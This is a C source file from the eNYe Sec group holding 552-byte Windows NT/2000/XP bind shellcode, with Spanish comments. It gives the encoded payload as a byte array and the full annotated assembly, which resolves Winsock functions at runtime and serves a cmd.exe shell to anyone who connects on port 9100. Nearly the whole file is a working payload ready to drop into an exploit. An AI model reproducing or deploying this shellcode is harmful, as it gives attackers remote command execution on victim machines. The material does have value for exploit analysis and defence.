/* * Version: 0.1 * * Bind Shellcode por RaiSe * Funciona en Windows NT/2000/XP con todos los Service Packs * * No tiene nulls, ni retornos de linea, ni espacios en blanco: * (0x00, 0x0a, 0x0d, 0x20) * * No usa direcciones hardcodeadas * Da una cmd shell en el puerto 9100 * Ocupa 552 bytes * * eNYe Sec - http://www.enye-sec.org */ char scode[] = "\xeb\x08\x90\x90\x90\xeb\x08\x90\x90\x90\xe8\xf6\xff\xff\xff\x58\x66\x05\xaa" "\x01\x8b\xd8\x24\xfc\x8d\x80\xac\xfd\xff\xff\x8b\xe8\x8d\x80\xac\xfe\xff\xff" "\x8b\xe0\x89\x5d\x10\x32\xd2\x88\x53\x0e\x88\x53\x1b\x88\x53\x26\x88\x53\x31" "\x88\x53\x3c\x88\x53\x41\x88\x53\x48\x88\x53\x4f\x88\x53\x5e\x88\x53\x6a\x88" "\x53\x6e\x33\xd2\xb2\x30\x64\x8b\x1a\x8b\x5b\x0c\x8b\x5b\x0c\x8b\x1b\x8b\x1b" "\x8b\x5b\x18\x89\x5d\x14\x8b\x7b\x3c\x03\xfb\x8b\x57\x78\x03\xd3\x8d\x4a\x1f" "\x41\x8b\x01\x03\xc3\x33\xc9\x52\x8b\xd3\x50\x5b\x33\xc0\xfc\x8b\x3b\x03\xfa" "\x8b\x75\x10\x33\xc9\xb1\x0e\xf3\xa6\x74\x0b\x90\x90\x90\x90\x83\xc3\x04\x40" "\xeb\xe7\x90\x5a\x8b\xc8\x8b\x45\x14\x8b\x5a\x24\x03\xd8\x33\xff\x66\x8b\x3c" "\x4b\x8b\x4a\x1c\x03\xc8\x8b\x34\xb9\x03\xf0\x89\x75\x18\x8b\x5d\x10\x8d\x5b" "\x0f\x53\x8b\x4d\x14\x51\xff\xd6\x8d\x5b\x0c\x43\x53\xff\xd0\x89\x45\x1c\x8b" "\xfb\x8b\xd0\x8d\x5d\x24\x33\xc9\xb1\x07\x51\x33\xc9\x49\x32\xc0\xf2\xae\x52" "\x57\x52\x8b\x75\x18\xff\xd6\x5a\x89\x03\x43\x43\x43\x43\x59\x80\xf9\x03\x75" "\x07\x90\x90\x90\x90\x8b\x55\x14\xe2\xda\x8d\x95\xfc\xfd\xff\xff\x52\x33\xd2" "\x66\xba\x01\x01\x52\x8b\x5d\x24\xff\xd3\x33\xd2\x52\x52\x52\x52\x42\x52\x42" "\x52\x8b\x5d\x28\xff\xd3\x89\x45\x40\x33\xd2\x52\x66\xba\x23\x8c\x66\x52\x66" "\x33\xd2\xb2\x02\x66\x52\x8b\xdc\xb2\x16\x52\x53\x50\x8b\x75\x2c\xff\xd6\x33" "\xd2\xb2\x05\x52\x8b\x55\x40\x52\x8b\x75\x30\xff\xd6\x33\xd2\xb2\x16\x52\x54" "\x8d\x55\xb0\x52\x8b\x55\x40\x52\x8b\x75\x34\xff\xd6\x8b\xf0\x33\xc9\x66\xb9" "\x21\x01\x66\x49\x8d\xbd\xb0\xfe\xff\xff\x33\xc0\xf3\xaa\x8d\xbd\xb0\xfe\xff" "\xff\xc6\x07\x44\x89\x77\x38\x89\x77\x3c\x89\x77\x40\x66\xc7\x47\x2c\x01\x01" "\x8d\x95\xb0\xfe\xff\xff\x8d\x52\xac\x52\x57\x33\xd2\x52\x52\x52\x42\x52\x4a" "\x52\x52\x8b\x7d\x10\x8d\x7f\x6b\x57\x52\x8b\x75\x38\xff\xd6\x33\xd2\x52\x8b" "\x75\x3c\xff\xd6\x47\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x08" "\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41\x08\x77\x73\x32\x5f\x33\x32" "\x2e\x64\x6c\x6c\x08\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x08\x57\x53\x41" "\x53\x6f\x63\x6b\x65\x74\x41\x08\x62\x69\x6e\x64\x08\x6c\x69\x73\x74\x65\x6e" "\x08\x61\x63\x63\x65\x70\x74\x08\x43\x72\x65\x61\x74\x65\x50\x72\x6f\x63\x65" "\x73\x73\x41\x08\x45\x78\x69\x74\x50\x72\x6f\x63\x65\x73\x73\x08\x63\x6d\x64" "\x08"; /* ASM shellcode: jmp salto ret_salto: jmp volver salto: call ret_salto volver: pop eax add ax,01aah mov ebx,eax ; strings and al,0fch ; multiplo de 4 lea eax,[eax-254h] mov ebp,eax ; salvamos ebp lea eax,[eax-154h] mov esp,eax ; salvamos esp mov [ebp+10h],ebx ; GetProcAddress string ; 08h => 00h xor dl,dl mov byte ptr [ebx+0eh],dl mov byte ptr [ebx+1bh],dl mov byte ptr [ebx+26h],dl mov byte ptr [ebx+31h],dl mov byte ptr [ebx+3ch],dl mov byte ptr [ebx+41h],dl mov byte ptr [ebx+48h],dl mov byte ptr [ebx+4fh],dl mov byte ptr [ebx+5eh],dl mov byte ptr [ebx+6ah],dl mov byte ptr [ebx+6eh],dl xor edx,edx mov dl,30h mov ebx,fs:[edx] mov ebx,[ebx+0ch] mov ebx,[ebx+0ch] mov ebx,[ebx] ; mov ebx,[ebx] ; kernel32 mov ebx,[ebx+18h] ; kernel32 base mov [ebp+14h],ebx ; salvamos k32 mov edi,[ebx+3ch] ; pe header rva add edi,ebx mov edx,[edi+78h] ; export table rva add edx,ebx lea ecx,[edx+1fh] inc ecx ; para quitar el 20h mov eax,[ecx] ; name table rva add eax,ebx xor ecx,ecx push edx ; en la pila export table mov edx,ebx ; en edx k32 push eax pop ebx ; name table en ebx xor eax,eax cld buscar: ; encontrar GetProcAddress mov edi,[ebx] ; name table string add edi,edx mov esi,[ebp+10h] ; 'GetProcAddress' xor ecx,ecx mov cl,0eh repe cmpsb je encontrada add ebx,04h inc eax jmp buscar nop ; evitar un 0xa (en el je) encontrada: pop edx ; recuperamos export table mov ecx,eax ; contador mov eax,[ebp+14h] ; k32 mov ebx,[edx+24h] ; ordinal table rva add ebx,eax xor edi,edi mov di,word ptr [ebx+ecx*2] ; indice mov ecx,[edx+1ch] ; address table rva add ecx,eax mov esi,[ecx+edi*4] add esi,eax mov [ebp+18h],esi ; direccion de GetProcAddress ; bloque de cargar direcciones de funciones mov ebx,[ebp+10h] lea ebx,[ebx+0fh] ; LoadLibraryA string push ebx mov ecx,[ebp+14h] ; k32 base push ecx call esi ; getprocadress lea ebx,[ebx+0ch] ; eliminar un 0xd inc ebx ; ws2_32.dll string push ebx call eax mov [ebp+1ch],eax ; ws2_32 base mov edi,ebx mov edx,eax ; ws2_32 base en edx lea ebx,[ebp+24h] ; donde se guardan xor ecx,ecx mov cl,07h ; 7 funciones mas_funciones: push ecx xor ecx,ecx dec ecx ; ecx no afecte a scasb xor al,al repne scasb ; edi apunta a siguiente string push edx ; salvamos w2_32 base push edi push edx mov esi,[ebp+18h] ; GetProcAddress call esi pop edx ; recuperamos ws2_32 base mov [ebx],eax inc ebx inc ebx inc ebx inc ebx ; donde guardar siguiente direccion pop ecx ; recuperamos ecx cmp cl,03h jne no_k32 mov edx,[ebp+14h] ; ahora k32_base no_k32: loop mas_funciones ; llamamos a WSAStartup lea edx,[ebp-204h] push edx xor edx,edx mov dx,0101h push edx mov ebx,[ebp+24h] call ebx ; WSASocketA xor edx,edx push edx push edx push edx push edx inc edx push edx inc edx push edx mov ebx,[ebp+28h] call ebx mov [ebp+40h],eax ; soc descriptor ; bind xor edx,edx push edx ; INADDR_ANY mov dx,8c23h ; puerto 9100 push dx xor dx,dx mov dl,02h ; AF_INET push dx mov ebx,esp mov dl,16h push edx push ebx push eax ; soc mov esi,[ebp+2ch] ; bind call esi ; listen xor edx,edx mov dl,05h ; backlog push edx mov edx,[ebp+40h] ; soc push edx mov esi,[ebp+30h] ; listen call esi ; accept xor edx,edx mov dl,16h push edx push esp lea edx,[ebp-50h] push edx mov edx,[ebp+40h] ; soc push edx mov esi,[ebp+34h] ; accept call esi mov esi,eax ; soc2 ; CreateProcessA xor ecx,ecx mov cx,0121h ; evitar 0x20 dec cx lea edi,[ebp-150h] xor eax,eax rep stosb ; inicializamos a 0 lea edi,[ebp-150h] ; STARTUPINFO mov byte ptr [edi],44h mov [edi+38h],esi mov [edi+3ch],esi mov [edi+40h],esi mov word ptr [edi+2ch],0101h ; dwFlags STARTF_USESTDHANDLES | STARTF_USESSHOWWINDOW lea edx,[ebp-150h] lea edx,[edx-54h] ; PROCESS_INFORMATION push edx push edi xor edx,edx push edx push edx push edx inc edx push edx dec edx push edx push edx mov edi,[ebp+10h] lea edi,[edi+6bh] ; cmd string push edi push edx mov esi,[ebp+38h] ; CreateProcessA call esi ; ExitProcess xor edx,edx push edx mov esi,[ebp+3ch] ; ExitProcess call esi db "GetProcAddress",8 db "LoadLibraryA",8 db "ws2_32.dll",8 db "WSAStartup",8 db "WSASocketA",8 db "bind",8 db "listen",8 db "accept",8 db "CreateProcessA",8 db "ExitProcess",8 db "cmd",8 */ /* EOF */